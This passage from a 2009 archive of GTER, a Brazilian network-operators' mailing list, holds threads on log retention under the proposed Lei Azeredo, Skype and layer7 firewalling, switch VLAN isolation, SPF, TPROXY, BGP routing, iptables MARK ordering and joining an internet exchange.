utilizada nos USA, que permite o armazenamento de certos logs de tr?fego. Creio que haver? a necessidade de algo do g?nero "CALEA" para atendimento da Lei Azeredo. Deixando claro que n?o estou fazendo nenhuma compara??o entre leis, nem dizendo que o CALEA atenda essa necessidade. Abs Toledo > > Atribuir ip valido a todos e salvar os logs do radius ou DHCP durante > o tempo previsto ? um come?o. O restante ainda n?o obtive > aconselhamento jur?dico detalhado o suficiente para saber at? onde > salvar. > > > > > > -----Mensagem original----- > > De: gter-bounces at eng.registro.br > [mailto:gter-bounces at eng.registro.br] > > Em nome de Edinilson - ATINET > > Enviada em: ter?a-feira, 30 de junho de 2009 11:31 > > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > > Assunto: [GTER] Log das conexoes > > Prioridade: Alta > > > > Caros amigos, como ? praticamente certeza que a Lei Azeredo ira > > passar, como voces estao pretendendo gerar e armazenar os logs das > > conexoes dos usuarios? > > > > Obrigado > > > > Edinilson > > --------------------------------------------------------- > > ATINET-Professional Web Hosting > > Tel Voz: (0xx11) 4412-0876 > > http://www.atinet.com.br > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter -- gter list https://eng.registro.br/mailman/listinfo/gter Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.375 / Banco de dados de v?rus: 270.13.0/2210 - Data de Lan?amento: 06/30/09 06:10:00 From ce.langoni at gmail.com Tue Jun 30 14:05:30 2009 From: ce.langoni at gmail.com (Carlos Eduardo Langoni) Date: Tue, 30 Jun 2009 14:05:30 -0300 Subject: [GTER] Layer7 x Skype In-Reply-To: <58aa8d780906261536m63337fabh92ed4add8a3e694c@mail.gmail.com> References: <58aa8d780906252016w7b4ca1cbu610e88bf87aabc73@mail.gmail.com> <58aa8d780906261536m63337fabh92ed4add8a3e694c@mail.gmail.com> Message-ID: <8aa07a210906301005l7a9ae844t482def60439133d4@mail.gmail.com> Wagner, Qual vers?o de kernel, iptables e layer7 voc? est? utilizando? Eu acabei de implementar um kernel 2.6.28+iptables 1.4.1.1 e layer7 2.21 e, pelo menos no bloqueio, est? funcionando direitinho. Fiz tudo para debia etch e tenho os pacotes .deb prontos aqui, acredito que funcione no lenny tamb?m, mas ainda n?o testei. Se quiser testar me avisa que eu te mando os pacotes. Abra?os Carlos 2009/6/26 Flavio Junior : > Sim, sem nenhum problemas (alem dos "possiveis" com a libera?ao) > > -- > > Fl?vio do Carmo J?nior aka waKKu > > 2009/6/26 Wagner Santos > >> Fl?vio, >> >> Nessa tua solu??o tu consegue falar com quem est? fora da tua LAN? Pois >> aqui >> o Skype funciona bem para dentro da pr?pria LAN, j? fora, ele come?a >> listando quem est? online, depois o pessoal cai todinho, repentinamente >> volta a lista mas ao final, ningu?m fala com quem est? fora. >> >> 2009/6/26 Flavio Junior >> >> > Olha.. sinceramente nao sei te dizer se o skype vai funcionar, se o teu >> > proxy nao permitir... >> > >> > Aqui eu tenho um cenario parecido, firewall em DROP e proxy em DENY.. So >> > libero o que ? realmente necessario. >> > >> > A unica (e HORRIVEL) forma que consigo fazer o skype funcionar BEM >> > (conectar >> > nao basta, enviar mensagens sera sempre um problema) ? liberando no proxy >> a >> > conexao HTTPS para IP's. >> > >> > Como citei, ? uma solu?ao horrivel, vai contra toda minha ideia de >> politica >> > de DROP no proxy.. Mas mantenho meus relatorios sempre atualizados e vejo >> > que na minha rede, ninguem ta abusando dessa "caracteristica" de acesso. >> > At? >> > por que ? complicado navegar em sites usando somente o IP, o site tem que >> > permitir isso ou tu usar um "firebug" da vida pra ficar alteradno os >> > hiperlinks, e ainda esse destino tem q estar disponivel pra HTTPS tambem. >> > >> > Bom, a linha ? a seguinte: >> > squid.conf: >> > acl whitelist url_regex -i "/etc/squid/whitelist.lst" >> > # Impedindo o squidGuard de ser chamado para a whitelist >> > redirector_access allow !whitelist !bannedsources >> > http_access deny bannedsources !whitelist >> > http_access allow whitelist >> > >> > /etc/squid/whitelist.lst: >> > # Unica forma que encontrei de fazer o skype funcionar DECENTEMENTE foi: >> > # Liberar conexoes SSL (porta 443) a destinos no formato IP. >> > # Isso e horrivel! >> > ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:443$ >> > >> > >> > Mantive at? os comentarios originais ;) >> > >> > -- >> > >> > Fl?vio do Carmo J?nior aka waKKu >> > >> > >> > 2009/6/18 Wagner Santos >> > >> > > Car at s, >> > > >> > > Tenho um firewall Linux com iptables, onde nossas pol?ticas padr?es s?o >> > > todas DROP (INPUT, FORWARD e OUTPUT). Tudo funciona bem, exceto o Skype >> > > (preciso que o Skype funcione para toda a rede). Tenho tudo devidamente >> > > compilado e instalado por?m o Layer7 est? me retornado a seguinte >> > mensagem: >> > > >> > > "layer7: couldn't get conntrack." >> > > >> > > J? fiz v?rias pesquisas mas n?o encontrei nenhuma solu??o, inclusive >> > > pesquisei aqui na lista, mas n?o encontrei nada. >> > > >> > > Algu?m j? passou por isso? >> > > >> > > -- >> > > Wagner Santos >> > > 81 9127 9823 / 81 8781 9823 >> > > >> > > wagnerpaxs @NOSPAM gmail.com >> > > wagner @NOSPAM dotlinux.net >> > > >> > > ICQ: 83709017 | Jabber: xwindow at jabber.org >> > > >> > > Linux User #408917 >> > > DotLinux.Net - http://www.dotlinux.net/ >> > > Debian-PE ? ?- >> > > http://pe.debianbrasil.org/ >> > > -- >> > > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > >> > -- >> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > >> >> >> >> -- >> Wagner Santos >> 81 9127 9823 / 81 8781 9823 >> >> wagnerpaxs @NOSPAM gmail.com >> wagner @NOSPAM dotlinux.net >> >> ICQ: 83709017 | Jabber: xwindow at jabber.org >> >> Linux User #408917 >> DotLinux.Net - http://www.dotlinux.net/ >> Debian-PE ? ?- >> http://pe.debianbrasil.org/ >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From brunocardoso at unerj.br Tue Jun 30 14:32:51 2009 From: brunocardoso at unerj.br (Bruno R. Cardoso) Date: Tue, 30 Jun 2009 14:32:51 -0300 Subject: [GTER] Port Vlan em Switch 3com In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <4A43F404.9020304@jarruda.com> <000001c9f629$649d6b20$2dd84160$@com> Message-ID: <4A4A4C43.1060803@unerj.br> Port isolate para o que voc? necessita est? bom. N?o sei se criando vlans para cada porta seria a forma mais bonita. casfre at gmail.com escreveu: > Ol?, > > 2009/6/26 Antonio Junior : > >> Bom dia pessoal, >> >> Gostaria de saber se algu?m pode me ajudar. Pois estou quebrando a cabe?a >> para fazer o seguinte em um switch 3com l2: >> >> Porta 1 ? 24 n?o se comunicam entre si. >> E todas as portas se comunicam com a 25. >> >> Quero fazer apenas untagged vlan, pois quero apenas isolar as portas, e >> fazer com que eles se comuniquem apenas com o servidor na porta uplink. >> >> Se algu?m tiver alguma sugest?o de como fazer agrade?o, pois tentei fazer, >> por?m n?o consigo adicionar uma porta (uplink) em mais de 2 untagged vlans. >> > > Qual seria o switch? > > Se entendi bem (e aprendi com pessoas aqui da GTER), seu problema > seria resolvido com private vlans (mas, como aprendiz, posso estar > falando besteira). > > Se forem switches como: 3C16476CS, 3C16475CS, 3CBLSF26, 3CBLSF50 e > 3CBLSG16 e eu n?o tiver entendido mal o manual, voc? s? conseguir? > fazer isso usando 802.1q (porta 25 tagged). > > Se os switch for dessas linhas e voc? conseguir fazer o que > pretende, por favor, me avise, pois eu tamb?m gostaria de fazer. :-) > > Obrigado. > > C?ssio > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Bruno Rafael Cardoso Tecnologia da Informa??o Centro Universit?rio de Jaragu? do Sul - UNERJ Telefone (47)3275-8200 Site: http://www.unerj.br From cleber-listas at inetweb.com.br Tue Jun 30 16:19:12 2009 From: cleber-listas at inetweb.com.br (Cleber - Listas) Date: Tue, 30 Jun 2009 16:19:12 -0300 Subject: [GTER] RES: SPF e BOL In-Reply-To: References: Message-ID: <6AF33C521DDE43FEABB21230B5BFAFA8@INETWEB.local> Alexandre, Erro do pessoal do Bol, pois neste IP o reverso ? deles. 4.116.17.187.in-addr.arpa name = relay7.bol.com.br 116.17.187.in-addr.arpa nameserver = eliot.uol.com.br 116.17.187.in-addr.arpa nameserver = borges.uol.com.br eliot.uol.com.br internet address = 200.221.11.98 borges.uol.com.br internet address = 200.147.255.105 -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Alexandre Gorges Enviada em: ter?a-feira, 30 de junho de 2009 16:06 Para: Lista GTER Assunto: [GTER] SPF e BOL Algu?m respons?vel pelo BOL, pode verificar o registro SPF? Meu servidor tem recebido emails por alguns servidores relay[1-9].bol.com.br Mas o registro SPF do proprio BOL n?o autoriza essas m?quinas. Um exemplo: Jun 30 16:01:22 mx postfix/smtpd[11194]: NOQUEUE: reject: RCPT from relay7.bol.com.br[187.17.116.4]: 550 5.7.1 : Recipient address rejected: Please see http://www.openspf.org/Why?s=mfrom&id=cliente%40bol.com.br&ip=187.17.116.4&r =mx.netuno.com.br; from= to= proto=ESMTP helo= Consultando o SPF. As classes autorizadas s?o: bol.com.br. 634 IN TXT "v=spf1 ip4:200.221.11.0/24 ip4:200.221.29.0/24 ip4:200.221.4.0/24 ip4:200.221.24.0/24 -all" []'s Alexandre Gorges http://algorges.blogspot.com http://www.dag.eti.br MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com -- gter list https://eng.registro.br/mailman/listinfo/gter Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.375 / Banco de dados de v?rus: 270.13.0/2210 - Data de Lan?amento: 06/30/09 06:10:00 From bruno at anid.com.br Tue Jun 30 16:23:19 2009 From: bruno at anid.com.br (Bruno Cabral) Date: Tue, 30 Jun 2009 16:23:19 -0300 (BRT) Subject: [GTER] Problemas com Tproxy In-Reply-To: References: <4A48D46B.4050107@conectcor.com.br> <9307FA2E375143A89EAA9EBF8B8C5269@admgaz.com.br> Message-ID: <55387.187.45.84.5.1246389799.squirrel@anid.com.br> > Ol? Welisson, > Acredito que se voc? nao estiver usando WCCP ou algo semelhante, > e usar o TPROXY, os pacotes v?o sair com o IP do cliente, s? que > quando voltar pelo seu router, ele vai entregar direto para os > clientes e n?o devolver para o proxy. Exatamente, o tproxy precisa estar em bridge entre a rede dos clientes e a Internet OU ser o roteador da rede para que o pacote de retorno seja recebido e cacheado []s, !3runo Cabral From bruno at anid.com.br Tue Jun 30 16:50:30 2009 From: bruno at anid.com.br (Bruno Cabral) Date: Tue, 30 Jun 2009 16:50:30 -0300 (BRT) Subject: [GTER] Res: Re: Problemas com o UOL? In-Reply-To: References: <1372033686-1246274670-cardhu_decombobulator_blackberry.rim.net-549337917-@bxe1207.bisx.prod.on.blackberry> Message-ID: <33723.187.45.84.5.1246391430.squirrel@anid.com.br> Ola N?o sei o que era mas resolveram, o gateway do UOL n?o est? mais perdendo pacotes Grato a todos que ajudaram []s, !3runo From tukso.antartiko at gmail.com Tue Jun 30 19:27:56 2009 From: tukso.antartiko at gmail.com (Tukso Antartiko) Date: Tue, 30 Jun 2009 19:27:56 -0300 Subject: [GTER] Problemas com Telemar In-Reply-To: <9E656FCAA5CE4DD4BD7A9C4C5DAD08E5@host> References: <9E656FCAA5CE4DD4BD7A9C4C5DAD08E5@host> Message-ID: Tire um pouco de prepend do seu an?ncio, pela Telem? ele chega assim: 7738 17379 18479 18479 18479 18479 18479 18479 18479 18479 18479 On 6/30/09, Guilherme Alberto wrote: > Pessoal, > > N?s somos um ASN e estamos dentro do Datacenter da Intelig na Lapa, > utilizando uma fibra do UOL que parte da Bar?o de Limeira (onde eles possuem > troca de tr?fego com v?rias outras operadoras). > > H? mais ou menos 20 dias come?amos a enfrentar um problema que est? > nos impactando bastante. Come?amos a enfrentar problemas com usu?rios que > utilizam banda larga da Velox, ou que utilizam rotas pela Telemar. > > Aparentemente as rotas a partir da Telemar chegam a alguns destinos atrav?s > de > rota internacional e para outros destinos, aparentemente possuem prioridade > e > chegam atrav?s de alguma fibra nacional. > > Tentamos entrar em contato com eles, mas informam que eles atendem apenas > clientes. N?s > estamos solicitando aos nossos usu?rios que enfrentam o problema, que entrem > em contato > com a Telemar para reclamar, mas sinto que n?o est? sendo suficiente. > > Pergunto para voc?s, quem ? a responsabilidade em resolver este problema ? > Algu?m pode me dar uma luz ? > Algu?m tem algum contato na Telemar/OI que pode me ajudar a resolver este > problema ? > > Segue abaixo um tracert partindo de um de nossos usu?rios, > > Rastreando a rota para 189.1.164.47 com no m?ximo 30 saltos > > 1 25 ms 15 ms 15 ms 200217089024.user.veloxzone.com.br > [200.217.89.24] > 2 15 ms 15 ms 15 ms > gigabitethernet5-2.81-cto-pi-rotd-03.telemar.net.br [200.217.30.62] > 3 1546 ms 30 ms 31ms 200.223.254.93 > 4 62 ms 31 ms 31 ms gi14-0-0.3-cen-ce-rotd-02.telemar.net.br > [200.164.188.195] > 5 109 ms 109 ms 109 ms Fa0-1-0.ARC-RJ-ROTB-01.telemar.net.br > [200.223.131.146] > 6 124 ms 124 ms 109 ms > Ge3-2-0-0-grtnycpt3.red.telefonica-wholesale.net[84.16.11.241] > 7 156 ms 109 ms 109 ms > XE1-0-2-0-grtnycpt2.red.telefonica-wholesale.net[213.140.38.129] > 8 3390 ms 171 ms 155 ms xe11-2-0-0-grtmiabr5.telefonica-wholesale.net > [84.16.15.126] > 9 265 ms 155 ms 265 ms > Xe0-3-0-0-grtsanem2.red.telefonica-wholesale.net[84.16.15.33] > 10 186 ms 187 ms 187 ms > TEBRASIL-2-2-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-addr.arpa > [84.16.10.14] > 11 186 ms 186 ms 187 ms 201-63-253-166.customer.tdatabrasil.net.br > [201.63.253.166] > 12 186 ms 186 ms 187 ms 201-63-54-194.customer.tdatabrasil.net.br > [201.63.54.194] > 13 187 ms 187 ms 437 ms 201-63-54-194.customer.tdatabrasil.net.br > [201.63.54.194] > 14 187 ms 187 ms 186 ms int1.idcsp.com.br [200.192.129.129] > 15 * 187ms * int1.idcsp.com.br [200.192.129.129] > 16 * * * Esgotado o tempo limite do pedido. > 17 170 ms 187 ms 187 ms 189.1.164.47 > > Rastreamento conclu?do. > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From alexandre at onda.psi.br Tue Jun 30 19:48:25 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Tue, 30 Jun 2009 19:48:25 -0300 Subject: [GTER] Cuidados com o Alvo(Target) Mark no iptables In-Reply-To: <8aa07a210906300613v1b6ccb67td1bd97a44674e70c@mail.gmail.com> References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com> <4A4A0ED7.7090701@onda.psi.br> <8aa07a210906300613v1b6ccb67td1bd97a44674e70c@mail.gmail.com> Message-ID: <4A4A9639.7060501@onda.psi.br> Carlos, ele cai na policy DEFAULT caso nenhuma outra regra bata com o pacote... mas se bater... desfaz o que fez anteriormente.. entao, sempre que eu utilizo mark, eu dou ACCEPT depois para que ele TERMINE o processamento daquele pacote... evitando que ele passe por outra analise adiante :) Carlos Eduardo Langoni wrote: > Alexandre, > > Depois do Mark voc? precisa dar um Accept se a Default Policy for > DROP, mas nunca utilizei nada na tabela mangle como Default Policy em > DROP e nunca vi em uso tamb?m. > > Abra?os! > > 2009/6/30 Alexandre J. Correa - Onda Internet : > >> depois do mark voce precisa dar um ACCEPT para que nao siga o >> processamento... >> >> MARK trabalha igual o RETURN (apenas nao marca) >> >> >> Carlos Eduardo Langoni wrote: >> >>> Demorei 3 dias para entender este problema e encontrar a solu??o para >>> ele, e acho que pode ser ?til para outras pessoas, a medida que >>> aumenta-se a oferta e disponibilidade de servi?os de acesso a >>> internet. >>> >>> Como todos sabem ? simples e eficiente fazer balanceamento de carga >>> entre dois links de internet com Linux. >>> Isso ? feito utilizando o Alvo(Target) MARK do iptables em conjunto >>> com algumas regras do iproute2[1]. >>> >>> O problema aparece quando come?amos a trabalhar com v?rios alvos MARK. >>> No meu caso espec?fico encontrei este problema quando comecei a >>> utilizar o NoCat como autenticador da rede, ele identifica o pacote j? >>> autenticado atrav?s de marcas relacionadas a pacotes, 0x4 para n?o >>> autenticados e 0x3,0x2 e 0x1 para os autenticados, dependendo do grupo >>> ele escolhe entre as marcas 3,2 e 1. >>> Quando eu precisei fazer com que determinados pacotes saissem por uma >>> segunda conex?o com a internet os problemas come?aram. De forma alguma >>> eu consegui fazer funcionar. Eu removia todas as regras subia apenas >>> as regras necess?rias ao roteamento e funcionava, quando misturava com >>> as regras nada de funcionar. >>> >>> Ap?s ler muitos logs e fazer muitos testes comecei a entender o >>> funcionamento. >>> No geral quando um pacote casa com uma regra o iptables para o >>> processamento na chain e passa para a pr?xima chain (ou para o envio >>> do pacote quando chega na ?ltima chain). Mas no caso do alvo MARK, >>> como o pacote n?o foi aceitado nem rejeitado, o processamento n?o >>> para, ele simplesmente associa o pacote ? marca e segue para pr?xima >>> regra. Se houver alguma outra regra de MARK conflitante, que tamb?m >>> case com o pacote, a marca do pacote ser? alterada. >>> >>> Exemplo: >>> iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 200.xxx.xxx.0/24 >>> -j MARK --set-mark 1 >>> iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 0/0 -j MARK >>> --set-mark 2 >>> Neste caso todos os pacotes com origem em 192.168.0.0/24 ser?o >>> marcados com 2 no final do processamento >>> Se a ?ltima regra desta chain fosse: >>> iptables -t mangle -A PREROUTING -s 0/0 -d 0/0 -j MARK --set-mark 5 >>> Todos os pacotes seriam marcados com 5. >>> >>> Desta forma ? preciso muita aten??o para criar regras de marca??o de >>> pacotes, a fim de evitar que a marca n?o seja aplicada corretamente. >>> No caso do exemplo a melhor ordem para as regras seria: >>> iptables -t mangle -A PREROUTING -s 0/0 -d 0/0 -j MARK --set-mark 5 >>> iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 0/0 -j MARK >>> --set-mark 2 >>> iptables -t mangle -A PREROUTING -s 192.168.0.0/24 -d 200.xxx.xxx.0/24 >>> -j MARK --set-mark 1 >>> >>> Desta forma todos os pacotes com origem em 192.168.0.0/24 com destino >>> a 200.xxx.xxx.0/24 recebem marca 1, com origem 192.168.0.0/24 e >>> qualquer destino recebem marca 2 e os demais pacotes marca 5 >>> >>> Espero que seja ?til para mais algu?m esta informa??o >>> >>> Abra?os a todos! >>> [1] http://lartc.org/ >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >>> >> -- >> Sds. >> >> Alexandre Jeronimo Correa >> >> Onda Internet >> www.onda.net.br >> >> IPV6 Ready ! >> www.ipv6.onda.net.br >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From frederick at dahype.org Tue Jun 30 20:00:53 2009 From: frederick at dahype.org (Renato Frederick) Date: Tue, 30 Jun 2009 19:00:53 -0400 Subject: [GTER] RES: Log das conexoes In-Reply-To: <220CAFD00976BD45BA31609CB04BE26D576695@mdssbs01.mdsystems.local> References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com><4A4A0ED7.7090701@onda.psi.br> <26A410474C334BCA9B62462933F841AF@atinet.com.br> <220CAFD00976BD45BA31609CB04BE26D576695@mdssbs01.mdsystems.local> Message-ID: E quem disse que o problema ? compactar log? Quem j? por engano ou curiosidade ativou um log all from any to any no firewall nota que o processamento vai l? para baixo. Quando estamos falando de centenas ou milhares de PPS passando pela interface, a coisa fica s?ria. Na minha concep??o fornecer prontamente de quem ?/era o IP que se meteu em confus?o seria suficiente, mas parece que o caminho n?o ? s? isto. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Tiago Machado Costa > Enviada em: ter?a-feira, 30 de junho de 2009 11:36 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] Log das conexoes > > Empresa pequena e media n?o vai ter problema com isto. > O Projeto ? ridiculo, mas se for aprovado, vamos ver o que acontece > n?... > > A maioria dos logs s?o tudo txt, isto compactado fica tranquilo. > > []s > Tiago > > PS - o Azeredo ? meio doido n? :) > > -----Original Message----- > From: gter-bounces at eng.registro.br [mailto:gter- > bounces at eng.registro.br] On Behalf Of Edinilson - ATINET > Sent: Tuesday, June 30, 2009 11:31 AM > To: Grupo de Trabalho de Engenharia e Operacao de Redes > Subject: [GTER] Log das conexoes > Importance: High > > Caros amigos, como ? praticamente certeza que a Lei Azeredo ira passar, > como > voces estao pretendendo gerar e armazenar os logs das conexoes dos > usuarios? > > Obrigado > > Edinilson > --------------------------------------------------------- > ATINET-Professional Web Hosting > Tel Voz: (0xx11) 4412-0876 > http://www.atinet.com.br > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter From bruno at anid.com.br Tue Jun 30 19:15:09 2009 From: bruno at anid.com.br (Bruno Cabral) Date: Tue, 30 Jun 2009 19:15:09 -0300 (BRT) Subject: [GTER] RES: RES: RES: Log das conexoes In-Reply-To: References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com><4A4A0ED7.7090701@onda.psi.br><26A410474C334BCA9B62462933F841AF@atinet.com.br> <98A337AA5E954C86A883B7E5E3B5BC3B@toledoPC> Message-ID: <44694.187.45.84.5.1246400109.squirrel@anid.com.br> > N?o li ainda a lei por completo, por?m, provavelmente iremos habilitar um > syslogd para armazenamento das informa??es em outro servidor. > Estamos inclusive, calculando os investimentos e provavelmente repassar a > conta ao usu?rio final. Este blog tem uma boa colet?nea de informa??es contra e a favor do projeto http://www.wirelessbrasil.org/wirelessbr/secoes/crimes_digitais/resumo.html []s, !3runo Cabral From tukso.antartiko at gmail.com Tue Jun 30 20:34:29 2009 From: tukso.antartiko at gmail.com (Tukso Antartiko) Date: Tue, 30 Jun 2009 20:34:29 -0300 Subject: [GTER] RES: RES: Log das conexoes In-Reply-To: <98A337AA5E954C86A883B7E5E3B5BC3B@toledoPC> References: <8aa07a210906300557x484137ceub038599d33f9af6d@mail.gmail.com> <4A4A0ED7.7090701@onda.psi.br> <26A410474C334BCA9B62462933F841AF@atinet.com.br> <98A337AA5E954C86A883B7E5E3B5BC3B@toledoPC> Message-ID: A CALEA n?o tem nada a ver com o que define este lei. Nos EUA o "log" ? feito AP?S o mandato judicial. No Brasil se presume que todos est?o praticando atividades criminosas, todos s?o monitorados "preventivamente". Quanto ao conte?do do log os EUA tamb?m n?o servem de subs?dio pois que tipo de informa??o voc? vai "logar" ? definido na ordem judicial. Outro grande diferencial ? que voc? pode cobrar do governo o que te custou para produzir a informa??o solicitada (m?o-de-obra e deslocamento). Mas se voc? quer uma opini?o de uma fonte embasada com profundo conhecimento t?cnico do assunto veja o que disse o excelent?ssimo relator do projeto, deputado J?lio Semeghini (PSDB-SP): "a proposta para os provedores guardarem as informa??es de tr?fego da rede em lugar protegido e seguro e s? poder liberar essas informa??es mediante mandado judicial tem exatamente o objetivo de garantir a nossa privacidade, pois hoje esses dados s?o tratados como informa??es comerciais para c?lculo das contas que devem ser pagas" Enfim, os caras legislam sobre o que n?o t?m a m?nima no??o, mas o que acaba valendo ? o que eles escrevem no papel. E mesmo que tivessem alguma no??o n?o faria diferen?a nenhuma, pois nem l?em direito o que aprovam, o relator faz um discurso de marketing sobre como uma canetada vai salvar o mundo e o presidente da mesa diz: "Todos que s?o favor?veis permane?am como se encontram. Aprovado". Voltando na palavra do excelent?ssimo o mesmo explicou ainda o que passa em sua cabe?a: " o projeto assegura a identifica??o de um IP mais pr?ximo poss?vel ?queles que possam ter participado de qualquer crime na rede, ou seja, um ?nico computador isolado ou uma rede corporativa ou acesso livre da internet numa determinada regi?o." Para isso precisa logar todo cidad?o de bem? O provedor deve saber muito bem a regi?o aproximada de determinado IP, n?o precisa ficar logando todo acesso ou associando uma pessoa ao mesmo, comprometendo a privacidade do usu?rio e permitindo a cria??o de provas falsas. Essa mania de identifica??o serve apenas para passar uma falsa sensa??o de seguran?a. Do que adianta ficar pedindo documento de identidade na entrada do pr?dio se o ladr?o sempre usa documento falsificado/roubado? Para que c?mera de seguran?a na loja de rua se o ladr?o entra de capacete/bon?? O mesmo acontece com IP, qualquer moleque sabe usar VPN de 5U$, TOR, webproxy baseado em an?ncios ou o trojan que mandou para o colega dizendo que eram fotos da Playboy. Nos EUA n?o existe documento de identidade obrigat?rio ou blitz policial (para "ver se est? tudo certo") e a taxa de resolu??o (e cumprimento) de crimes ? bem maior do que no Brasil. No Brasil, se n?o tem digital nem documento de identidade quente, a "autoridade competente" solta um "infelizmente" e vai embora. Se o condenado ou procurado n?o est? na casa dele ... "infelizmente". On 6/30/09, Toledo, Luis Carlos wrote: > > Desde 1994 existe uma lei nos USA chamada CALEA (Communications Assistance > for Law Enforcement Act), que em um trecho diz "to make clear a > telecommunications carrier's duty to cooperate in the interception of > communications for Law Enforcement purposes, and for other purposes." > > Assim existe uma solu??o tamb?m chamada CALEA utilizada nos USA, que permite > o armazenamento de certos logs de tr?fego. > > Creio que haver? a necessidade de algo do g?nero "CALEA" para atendimento da > Lei Azeredo. > > Deixando claro que n?o estou fazendo nenhuma compara??o entre leis, nem > dizendo que o CALEA atenda essa necessidade. > > Abs Toledo > >> >> Atribuir ip valido a todos e salvar os logs do radius ou DHCP >> durante o tempo previsto ? um come?o. O restante ainda n?o >> obtive aconselhamento jur?dico detalhado o suficiente para >> saber at? onde salvar. >> >> >> >> >> > -----Mensagem original----- >> > De: gter-bounces at eng.registro.br >> [mailto:gter-bounces at eng.registro.br] >> > Em nome de Edinilson - ATINET >> > Enviada em: ter?a-feira, 30 de junho de 2009 11:31 >> > Para: Grupo de Trabalho de Engenharia e Operacao de Redes >> > Assunto: [GTER] Log das conexoes >> > Prioridade: Alta >> > >> > Caros amigos, como ? praticamente certeza que a Lei Azeredo ira >> > passar, como voces estao pretendendo gerar e armazenar os logs das >> > conexoes dos usuarios? >> > >> > Obrigado >> > > From wagnerfurquim at gmail.com Tue Jun 30 21:30:16 2009 From: wagnerfurquim at gmail.com (Wagner Furquim) Date: Tue, 30 Jun 2009 21:30:16 -0300 Subject: [GTER] =?iso-8859-1?q?Conex=E3o_PTT?= Message-ID: Boa Noite Pessoal, Estou com uma d?vida, estamos com um projeto para comprarmos transporte de dados at? um PTT em SP, algo perto de barueri. Atualmente j? trabalho com BGP, porem, fa?o peer com 1 operadora somente, no caso quando eu cair em um PTT, como seria essa quest?o ??eu tenho que fazer troca de trafego com todos que est?o no local?? ou existe alguma coisa mais simples?? ja possui uma politica padr?o ou algo assim?? n?o vai haver custos p/ trocar trafego nacional?? realmente sou leigo neste assunto. Agrade?o Antecipadamente, -- Wagner A. Furquim Jr CSCO10797322 Cel: (18) 8121.4415 From bruno at anid.com.br Tue Jun 30 22:34:29 2009 From: bruno at anid.com.br (Bruno Cabral) Date: Tue, 30 Jun 2009 22:34:29 -0300 (BRT) Subject: [GTER] =?iso-8859-1?q?Conex=E3o_PTT?= In-Reply-To: References: Message-ID: <37608.187.45.84.5.1246412069.squirrel@anid.com.br> > Atualmente j? trabalho com BGP, porem, fa?o peer com 1 operadora > somente, no caso quando eu cair em um PTT, como seria essa quest?o ?? > eu tenho que fazer troca de trafego com todos que est?o no local?? > ou existe alguma coisa mais simples?? ja possui uma politica padr?o > ou algo assim?? n?o vai haver custos p/ trocar trafego nacional?? > realmente sou leigo neste assunto. Ola existe um acordo de troca mutua/multilateral (ATM) ao qual voc? adere, este somente j? lhe d? um bom tr?fego existem tamb?m acordos privados, via VLAN, tratados caso a caso. ? importante, portanto, que seu transporte seja L2 para poder enxergar a VLAN. OU ent?o vai precisar colocar um roteador no local da entrega do circuito OU se contentar com o ATM note que nao ? "trafego nacional", ? trafego com os participantes do PTT. quanto a configura??o, ? s? adicionar outro neighbor no seu servidor BGP, coisa relativamente simples []s, !3runo Cabral From itamar at ispbrasil.com.br Tue Jun 30 22:10:54 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Tue, 30 Jun 2009 22:10:54 -0300 Subject: [GTER] =?iso-8859-1?q?Conex=E3o_PTT?= In-Reply-To: References: Message-ID: sim, basicamente e' isto. 2009/6/30 Wagner Furquim : > ? Boa Noite Pessoal, > > > ?Estou com uma d?vida, estamos com um projeto para comprarmos transporte de > dados at? um PTT em SP, algo perto de barueri. > > ? ?Atualmente j? trabalho com BGP, porem, fa?o peer com 1 operadora > somente, no caso quando eu cair em um PTT, como seria essa quest?o ??eu > tenho que fazer troca de trafego com todos que est?o no local?? ou existe > alguma coisa mais simples?? ja possui uma politica padr?o ou algo assim?? > n?o vai haver custos p/ trocar trafego nacional?? realmente sou leigo neste > assunto. > > > ? ? ?Agrade?o Antecipadamente, > > -- > Wagner A. Furquim Jr > CSCO10797322 > Cel: (18) 8121.4415 > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From afraniodido at gmail.com Tue Jun 30 22:49:20 2009 From: afraniodido at gmail.com (Afranio Nunes) Date: Tue, 30 Jun 2009 22:49:20 -0300 Subject: [GTER] RES: RES: Log das conexoes In-Reply-To: <98A337AA5E954C86A883B7E5E3B5BC3B@toledoPC> 